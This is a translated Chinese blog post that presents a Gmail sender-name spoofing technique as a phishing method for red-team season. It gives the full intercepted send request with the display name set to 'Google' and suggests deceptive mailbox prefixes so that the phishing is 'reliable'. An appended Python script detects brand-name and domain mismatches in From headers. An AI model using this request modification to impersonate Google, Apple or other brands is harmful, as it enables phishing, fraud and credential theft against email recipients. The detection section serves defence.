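Article source: 辛巴大佬
Fellow green hats, I hear HVV is coming up, which means phishing season is almost here too, so today I am bringing you a Gmail phishing method.
Because of some Google restrictions, we cannot register certain special usernames at sign-up, for example names containing special characters or the name "Google".
However, by bypassing Google's restriction, the sender name of an email can be changed to exactly "Google", "Apple" and other official names.
Proof of concept:
Bypassing the restriction:
Capture the request while sending an email.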
POST /sync/u/0/i/s?hl=zh-CN&c=22 HTTP/2
Host: mail.google.com
Cookie: COMPASS=x x x x x x x x x x x x x x x x x x x x x x x x x
Content-Length: 656
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="98", "Google Chrome";v="98"
X-Framework-Xsrf-Token: xxxxxxxxxxxxxxxxxxxxx
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Content-Type: application/json
X-Google-Btd: 1
X-Gmail-Btai: {"3":{"6":0,"10":1,"13":1,"15":0,"16":1,"17":1,"18":0,"19":1,"22":1,"23":1,"24":1,"25":1,"26":1,"27":1,"28":1,"29":0,"30":1,"31":1,"32":1,"33":1,"34":1,"35":0,"36":1,"37":"zh-CN","38":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.109 Safari/537.36","39":1,"40":0,"41":25,"43":0,"44":1,"45":0,"46":1,"47":1,"48":1,"49":1,"50":1,"52":1,"53":1,"54":0,"55":1,"56":1,"57":0,"58":0,"60":0,"61":1,"62":0,"63":1,"64":1,"66":1,"67":1,"69":1,"70":0,"71":1,"72":0,"73":1},"5":"cef43d678f","7":25,"8":"gmail.pinto-server_20220225.06_p1","9":1,"10":5,"11":"","12":28800000,"13":"+08:00","14":1,"16":431522263,"17":"","18":"","19":"xxxxxxxxxxxxxxx","21":"11874"}
Sec-Ch-Ua-Platform: "macOS"
Accept: */*
Origin: https://mail.google.com
X-Client-Data: xxxxxxxxxxxxxxxxxxx
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://mail.google.com/mail/u/0/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

{"2":{"1":[{"1":"5","2":{"1":"thread-a:r-xxxxxxxxxxx","2":{"14":{"1":{"1":"msg-a:r-xxxxxxxxxxx","2":{"1":1,"2":"[email protected]","3":"google","10":"[email protected]"},"3":[{"1":1,"2":"收件人@qq.com"}],"7":"xxxxxx","8":"hack by xinba","9":{"2":[{"1":0,"2":"<div dir=\"ltr\">1234</div>"}],"7":1},"11":["^all","^pfg","^f_bt","^f_btns","^f_cl","^a"],"18":"xxxxxxxxxxx","36":{"6":0},"37":{"4":0},"42":0,"43":{"1":0,"2":0,"3":0,"4":0},"52":"s:xxxxxxxxx|#msg-a:r-952505133084427487|0"},"3":1}}}}]},"3":{"1":1,"2":"11874","5":{"2":0},"7":1},"4":{"1":"xxxxxxxx","2":1,"3":"xxxxxxxxx","4":1,"5":70},"5":2}
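Look at the result and compare it with the genuine emails from Apple and QQ Reading. By the way, I received the mail in QQ Mail; the "Google" at the top is the forged email we just sent.
Then register a new email account and get creative with the mailbox prefix, and the phish is solid and reliable.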
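For the receiving side, the following added example (not from the original article) flags mail whose sender display name or mailbox prefix claims a brand while the address belongs to a different domain. The brand-to-domain table, the function names and the sample messages are assumptions made for illustration.

```python
import unicodedata
from email import message_from_string, policy

# Assumption: brand -> domains that brand legitimately sends from.
# Illustrative values only; maintain your own list.
BRAND_DOMAINS = {"google": {"google.com"}, "apple": {"apple.com"}}

def normalize(text):
    """NFKC-fold, casefold and keep only letters/digits, so 'G o o g l e'
    and full-width forms compare equal to 'google'. Cross-script
    homoglyphs (e.g. Cyrillic) are NOT folded by this."""
    folded = unicodedata.normalize("NFKC", text).casefold()
    return "".join(ch for ch in folded if ch.isalnum())

def domain_allowed(domain, allowed):
    """True if domain is one of the allowed domains or a subdomain of one."""
    return any(domain == d or domain.endswith("." + d) for d in allowed)

def check_from(raw_message):
    """Return a list of (reason, brand, address) findings for the From header."""
    msg = message_from_string(raw_message, policy=policy.default)
    header = msg["From"]
    if header is None:
        return [("missing-from", None, None)]
    findings = []
    for addr in header.addresses:
        display, local = normalize(addr.display_name), normalize(addr.username)
        for brand, allowed in BRAND_DOMAINS.items():
            if domain_allowed(addr.domain.lower(), allowed):
                continue  # brand name used on the brand's own domain
            if brand in display:
                findings.append(("display-name", brand, addr.addr_spec))
            elif brand in local:
                # Substring match: expect false positives such as "pineapple".
                findings.append(("local-part", brand, addr.addr_spec))
    return findings

# Constructed sample messages (not real traffic).
SPOOFED = "From: Google <constructed.sender@example.net>\nSubject: t\n\nbody\n"
PREFIX = "From: Support <apple.id.support@example.net>\nSubject: t\n\nbody\n"
GENUINE = "From: Google <no-reply@accounts.google.com>\nSubject: t\n\nbody\n"

if __name__ == "__main__":
    for sample in (SPOOFED, PREFIX, GENUINE):
        print(check_from(sample))
```

Because such a message really is sent through the mailbox provider, SPF and DKIM pass for the provider's domain, so the useful signal is the mismatch between the claimed name and the address domain.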